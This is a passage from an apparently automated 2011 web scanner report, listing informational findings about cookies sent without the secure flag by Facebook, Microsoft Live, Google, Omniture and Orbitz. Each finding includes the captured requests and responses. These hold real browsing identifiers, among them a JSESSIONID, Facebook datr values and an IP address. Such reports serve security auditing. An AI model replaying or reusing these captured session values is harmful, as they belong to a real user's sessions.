wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ajax/intl/language_dialog.php HTTP/1.1
Host: login.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=deleted; datr=8CJHTYhjyotVYfKpZ5B35lnF; __utma=deleted; lsd=ErPUD; reg_fb_ref=https%3A%2F%2Flogin.facebook.com%2Flogin.php%3Flogin_attempt%3D1; wd=deleted; __utmc=deleted; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS; reg_fb_gate=https%3A%2F%2Flogin.facebook.com%2Flogin.php%3Flogin_attempt%3D1; __utmb=deleted;

Response

HTTP/1.1 200 OK
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
X-FB-Server: 10.36.235.108
Set-Cookie: __utma=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmb=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmc=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmz=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
Connection: close
Date: Wed, 02 Feb 2011 16:32:08 GMT
Content-Length: 43204

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

7.31. https://login.facebook.com/help/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://login.facebook.com
Path:	/help/

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

__utma=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
__utmb=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
__utmc=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
__utmz=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
reg_fb_ref=https%3A%2F%2Flogin.facebook.com%2Fhelp%2F; path=/; domain=.facebook.com
wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /help/ HTTP/1.1
Host: login.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=deleted; datr=8CJHTYhjyotVYfKpZ5B35lnF; __utma=deleted; lsd=ErPUD; reg_fb_ref=https%3A%2F%2Flogin.facebook.com%2Flogin.php%3Flogin_attempt%3D1; wd=deleted; __utmc=deleted; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS; reg_fb_gate=https%3A%2F%2Flogin.facebook.com%2Flogin.php%3Flogin_attempt%3D1; __utmb=deleted;

Response

7.32. https://login.facebook.com/login.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://login.facebook.com
Path:	/login.php

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

__utma=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
__utmb=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
__utmc=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
__utmz=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
datr=8CJHTYhjyotVYfKpZ5B35lnF; expires=Fri, 01-Feb-2013 16:27:20 GMT; path=/; domain=.facebook.com; httponly
reg_fb_ref=https%3A%2F%2Flogin.facebook.com%2Flogin.php%3Flogin_attempt%3D1; path=/; domain=.facebook.com
wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /login.php?login_attempt=1 HTTP/1.1
Host: login.facebook.com
Connection: keep-alive
Referer: https://login.facebook.com/login.php?login_attempt=1
Cache-Control: max-age=0
Origin: https://login.facebook.com
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lsd=ErPUD; reg_fb_gate=https%3A%2F%2Flogin.facebook.com%2Flogin.php%3Flogin_attempt%3D1; datr=8CJHTYhjyotVYfKpZ5B35lnF; reg_fb_ref=https%3A%2F%2Flogin.facebook.com%2Flogin.php%3Flogin_attempt%3D1; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS; __utmz=87286159.1296663493.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=87286159.380325508.1296663493.1296663493.1296663493.1; __utmc=87286159; __utmb=87286159.1.10.1296663493; wd=1036x1012
Content-Length: 328

charset_test=%E2%82%AC%2C%C2%B4%2C%E2%82%AC%2C%C2%B4%2C%E6%B0%B4%2C%D0%94%2C%D0%84&lsd=ErPUD&return_session=0&legacy_return=1&display=&session_key_only=0&trynum=2&charset_test=%E2%82%AC%2C%C2%B4%2C%E2
...[SNIP]...

Response

7.33. https://login.facebook.com/r.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://login.facebook.com
Path:	/r.php

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

__utma=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
__utmb=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
__utmc=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
__utmz=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /r.php HTTP/1.1
Host: login.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=deleted; datr=8CJHTYhjyotVYfKpZ5B35lnF; __utma=deleted; lsd=ErPUD; reg_fb_ref=https%3A%2F%2Flogin.facebook.com%2Flogin.php%3Flogin_attempt%3D1; wd=deleted; __utmc=deleted; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS; reg_fb_gate=https%3A%2F%2Flogin.facebook.com%2Flogin.php%3Flogin_attempt%3D1; __utmb=deleted;

Response

7.34. https://login.live.com/login.srf previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://login.live.com
Path:	/login.srf

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

vv=1000&1296689641; expires=Wed, 16-Feb-2011 23:34:01 GMT;domain=login.live.com;path=/;HTTPOnly= ;version=1
MSPRequ=lt=1296660841&co=1&id=1184; path=/;version=1
MSPOK=$uuid-7b4c9ae6-5132-44a8-8b8a-1d3ed48d1979; path=/;version=1

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /login.srf?wa=wsignin1.0&rpsnv=11&ct=1296573765&rver=5.5.4177.0&wp=MBI&wreply=http:%2F%2Fwww.msn.com%2F&lc=1033&id=1184 HTTP/1.1
Host: login.live.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:34:01 GMT
Server: Microsoft-IIS/6.0
PPServer: PPV: 30 H: BAYIDSLGN1O44 V: 0
Content-Type: text/html; charset=utf-8
Expires: Wed, 02 Feb 2011 15:33:01 GMT
Cache-Control: no-cache
Pragma: no-cache
P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
X-XSS-Protection: 0
Set-Cookie: vv=1000&1296689641; expires=Wed, 16-Feb-2011 23:34:01 GMT;domain=login.live.com;path=/;HTTPOnly= ;version=1
Set-Cookie: MSPRequ=lt=1296660841&co=1&id=1184; path=/;version=1
Set-Cookie: MSPOK=$uuid-7b4c9ae6-5132-44a8-8b8a-1d3ed48d1979; path=/;version=1
X-Frame-Options: deny
Content-Length: 12728



<!-- RequestLCID: 1033, Market:EN-US, PrefCountry
...[SNIP]...

7.35. https://maps-api-ssl.google.com/maps previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://maps-api-ssl.google.com
Path:	/maps

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

PREF=ID=3c1c6ba55d5a5743:TM=1296574544:LM=1296574544:S=DhLUtFxFrNdY16c3; expires=Thu, 31-Jan-2013 15:35:44 GMT; path=/; domain=.google.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /maps HTTP/1.1
Host: maps-api-ssl.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 01 Feb 2011 15:35:44 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Set-Cookie: PREF=ID=3c1c6ba55d5a5743:TM=1296574544:LM=1296574544:S=DhLUtFxFrNdY16c3; expires=Thu, 31-Jan-2013 15:35:44 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Server: mfe
X-XSS-Protection: 1; mode=block
Connection: close

<!DOCTYPE html><html xmlns:v="urn:schemas-microsoft-com:vml" class=""><head> <meta content="text/html;charset=UTF-8" http-equiv="content-type"/> <meta http-equiv="X-UA-Compatible" content="IE=EmulateI
...[SNIP]...

7.36. https://omniturebanners.112.2o7.net/b/ss/omniturebanners/1/H.9--NS/0 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://omniturebanners.112.2o7.net
Path:	/b/ss/omniturebanners/1/H.9--NS/0

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

s_vi_x60bafx7Bzx7Djmnaajx7Dx7C=[CS]v4|0-0|4D49AEAF[CE]; Expires=Mon, 1 Feb 2016 19:21:19 GMT; Domain=.2o7.net; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/omniturebanners/1/H.9--NS/0 HTTP/1.1
Host: omniturebanners.112.2o7.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Wed, 02 Feb 2011 19:21:19 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_x60bafx7Bzx7Djmnaajx7Dx7C=[CS]v4|0-0|4D49AEAF[CE]; Expires=Mon, 1 Feb 2016 19:21:19 GMT; Domain=.2o7.net; Path=/
Location: https://omniturebanners.112.2o7.net/b/ss/omniturebanners/1/H.9--NS/0?AQB=1&pccr=true&g=none&AQE=1
X-C: ms-4.3.1
Expires: Tue, 01 Feb 2011 19:21:19 GMT
Last-Modified: Thu, 03 Feb 2011 19:21:19 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www20
Content-Length: 0
Content-Type: text/plain
Connection: close

7.37. https://sitesearch.omniture.com/center/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://sitesearch.omniture.com
Path:	/center/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

v1stsp=C92D8F8B772AFF13; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /center/ HTTP/1.1
Host: sitesearch.omniture.com
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _jsuid=9633613657349828981; omniture_unique=8efaa0a698bb71e2eade7cb7d05cb14e; cms_site_lang=1; use207=7; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%2C%5B%22seo_other_referer%22%2C%221296673199867%22%5D%5D; search_stack=%5B%5B%22seo_other_referer%22%2C%221296673232401%22%5D%5D; s_cid=seo_other_referer; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cc=true; mbox=PC#1296661217505-786518.17#1299092434|check#true#1296673300|session#1296673129491-732177#1296675094; s_sv_p1=1@15@s/5084/5072&e/5; s_sv_s1=1@29@a//1296661247027/594025749283; s_sq=omniturecom%2Comnitureall%2Comniturecomdev%2Comniturecomemea%2Comnitureapac%2Comniturenoncustomer%2Comniturecomen%3D%2526pid%253DPrivacy%25253A%2525202o7.net%252520Explained%2526pidt%253D1%2526oid%253Dhttp%25253A//my.omniture.com/%2526ot%253DA; sc_locale=en_US; sc_locale_numbers=en_US

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 19:00:29 GMT
Server: Atomz/1.0
Set-Cookie: v1stsp=C92D8F8B772AFF13; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.omniture.com
Content-Type: text/html
Via: 1.1 sitesearch.omniture.com:86
X-Cache: MISS from sitesearch.omniture.com
Keep-Alive: timeout=1, max=100
Connection: Keep-Alive
Content-Length: 10248

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- Copyright (c) 2011 Adobe Systems Incorporated. All rights
...[SNIP]...

7.38. https://www.facebook.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.facebook.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

__utma=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
__utmb=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
__utmc=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
__utmz=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
made_write_conn=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
W=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: W=1296674535; made_write_conn=1296674535; __utmz=87286159.1296663493.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); datr=8CJHTYhjyotVYfKpZ5B35lnF; __utma=87286159.380325508.1296663493.1296663493.1296663493.1; lsd=ErPUD; reg_fb_ref=https%3A%2F%2Flogin.facebook.com%2Flogin.php%3Flogin_attempt%3D1; __utmc=87286159; wd=1036x1012; reg_fb_gate=https%3A%2F%2Flogin.facebook.com%2Flogin.php%3Flogin_attempt%3D1; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS; __utmb=87286159.1.10.1296663493;

Response

7.39. https://www.facebook.com/2008/fbml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.facebook.com
Path:	/2008/fbml

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

__utma=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
__utmb=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
__utmc=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
__utmz=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
made_write_conn=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
W=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /2008/fbml HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: W=1296674535; made_write_conn=1296674535; __utmz=87286159.1296663493.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); datr=8CJHTYhjyotVYfKpZ5B35lnF; __utma=87286159.380325508.1296663493.1296663493.1296663493.1; lsd=ErPUD; reg_fb_ref=https%3A%2F%2Flogin.facebook.com%2Flogin.php%3Flogin_attempt%3D1; __utmc=87286159; wd=1036x1012; reg_fb_gate=https%3A%2F%2Flogin.facebook.com%2Flogin.php%3Flogin_attempt%3D1; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS; __utmb=87286159.1.10.1296663493;

Response

HTTP/1.1 404 Not Found
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: __utma=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmb=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmc=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmz=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: made_write_conn=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: W=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
Connection: close
Date: Thu, 03 Feb 2011 04:18:57 GMT
Content-Length: 11449

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

7.40. https://www.facebook.com/login.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.facebook.com
Path:	/login.php

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

__utma=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
__utmb=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
__utmc=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
__utmz=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
datr=8CJHTYhjyotVYfKpZ5B35lnF; expires=Sat, 02-Feb-2013 04:18:45 GMT; path=/; domain=.facebook.com; httponly
made_write_conn=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Flogin.php; path=/; domain=.facebook.com
W=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /login.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: W=1296674535; made_write_conn=1296674535; __utmz=87286159.1296663493.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); datr=8CJHTYhjyotVYfKpZ5B35lnF; __utma=87286159.380325508.1296663493.1296663493.1296663493.1; lsd=ErPUD; reg_fb_ref=https%3A%2F%2Flogin.facebook.com%2Flogin.php%3Flogin_attempt%3D1; __utmc=87286159; wd=1036x1012; reg_fb_gate=https%3A%2F%2Flogin.facebook.com%2Flogin.php%3Flogin_attempt%3D1; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS; __utmb=87286159.1.10.1296663493;

Response

7.41. https://www.orbitz.com/Secure/SignIn previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.orbitz.com
Path:	/Secure/SignIn

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

OSC=D3DD8128C5377A40141A9858208488B0; Path=/
logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|egapp2217p.prod.orbitz.net; Domain=.orbitz.com; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Secure/SignIn?z=2eb0&r=3 HTTP/1.1
Host: www.orbitz.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: DataPersistence="||||||Same as pick-up||||||0|0|false|||||||||||false||false|false|||||||||||||||||||||6|New+York%2C+NY|Orlando%2C+FL|02/11/11|||||||||mm/dd/yy|02/17/11||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy||||||||vacation_tab|"; JSESSIONID=D1DA21DD44B66783CD13169E22B74D3D; NSC_ufbmfbg.tel.80_dt_ufbmfbg=ffffffff09e3d5ba45525d5f4f58455e445a4a4217b9; BetaGroup="01/27/2011 19:45:19|A|A|N|C|N|H|B|P|N"; OSC=265DA875C314B0C54855FC80AB1B1D8C; myFavoriteHotels=favoriteHotels%3A%7CpastSearches%3A%7BHOTEL_Boston%2C+MA%2C+United+States_1_2011-02-01T00%3A00%3A00.000-06%3A00_2011-02-02T00%3A00%3A00.000-06%3A00____35371_2_1_1_1%7D; logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|egapp2217p.prod.orbitz.net; myTests=UBP323_SinglePage%3A%7C%3A%7C%3A%7CMERCH500_hotelResultCards%3A%7C%3A%7C%3A%7C%3A%7C%3A%7C%3A%7C%3A%7Cv1; NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3a72d45525d5f4f58455e445a4a4217b9; mbox=check#true#1296573951|session#1296573790873-999455#1296575751; dpc=HOTEL%7C1.6%7C%7CBoston%2C+MA%2C+United+States%7C%7C%7CUS%7C%7C%7C+%26%26HB%7C%7C2011-02-01%7C2011-02-02%7C1%7C2%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C+%7C%26%26HE; OrbitzRegistration="N,0,0,0"; NSC_JOu2s3r4deikrvveb50lfpcjwwizbbq=ffffffff09e3b63045525d5f4f58455e445a4a4217b9; anon=8916556551294354144817; PackagingContext=APH; WT_FPC=id=173.193.214.243-3953790720.30125555:lv=1296573936983:ss=1296573790782; adRotator=true; NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3887545525d5f4f58455e445a4a423660; intentmedia_user_id=e6908583-79a9-4ea3-a0a2-86edabb110c5;

Response

7.42. https://www.orbitz.com/Secure/ViewSecureCalendar previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.orbitz.com
Path:	/Secure/ViewSecureCalendar

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

OSC=95571C5B16DE6EDEF581BE2B2323412E; Path=/
logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|egapp2217p.prod.orbitz.net; Domain=.orbitz.com; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Secure/ViewSecureCalendar?z=2ec6&r=p HTTP/1.1
Host: www.orbitz.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: DataPersistence="||||||Same as pick-up||||||0|0|false|||||||||||false||false|false|||||||||||||||||||||6|New+York%2C+NY|Orlando%2C+FL|02/11/11|||||||||mm/dd/yy|02/17/11||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy||||||||vacation_tab|"; JSESSIONID=D1DA21DD44B66783CD13169E22B74D3D; NSC_ufbmfbg.tel.80_dt_ufbmfbg=ffffffff09e3d5ba45525d5f4f58455e445a4a4217b9; BetaGroup="01/27/2011 19:45:19|A|A|N|C|N|H|B|P|N"; OSC=265DA875C314B0C54855FC80AB1B1D8C; myFavoriteHotels=favoriteHotels%3A%7CpastSearches%3A%7BHOTEL_Boston%2C+MA%2C+United+States_1_2011-02-01T00%3A00%3A00.000-06%3A00_2011-02-02T00%3A00%3A00.000-06%3A00____35371_2_1_1_1%7D; logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|egapp2217p.prod.orbitz.net; myTests=UBP323_SinglePage%3A%7C%3A%7C%3A%7CMERCH500_hotelResultCards%3A%7C%3A%7C%3A%7C%3A%7C%3A%7C%3A%7C%3A%7Cv1; NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3a72d45525d5f4f58455e445a4a4217b9; mbox=check#true#1296573951|session#1296573790873-999455#1296575751; dpc=HOTEL%7C1.6%7C%7CBoston%2C+MA%2C+United+States%7C%7C%7CUS%7C%7C%7C+%26%26HB%7C%7C2011-02-01%7C2011-02-02%7C1%7C2%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C+%7C%26%26HE; OrbitzRegistration="N,0,0,0"; NSC_JOu2s3r4deikrvveb50lfpcjwwizbbq=ffffffff09e3b63045525d5f4f58455e445a4a4217b9; anon=8916556551294354144817; PackagingContext=APH; WT_FPC=id=173.193.214.243-3953790720.30125555:lv=1296573936983:ss=1296573790782; adRotator=true; NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3887545525d5f4f58455e445a4a423660; intentmedia_user_id=e6908583-79a9-4ea3-a0a2-86edabb110c5;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: OSC=95571C5B16DE6EDEF581BE2B2323412E; Path=/
Cache-Control: private
Pragma: no-cache
Set-Cookie: logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|egapp2217p.prod.orbitz.net; Domain=.orbitz.com; Path=/
P3P: CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR DELi SAMi OTRi BUS PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE GOV"
Content-Type: text/html
Content-Length: 936
Date: Wed, 02 Feb 2011 16:15:35 GMT
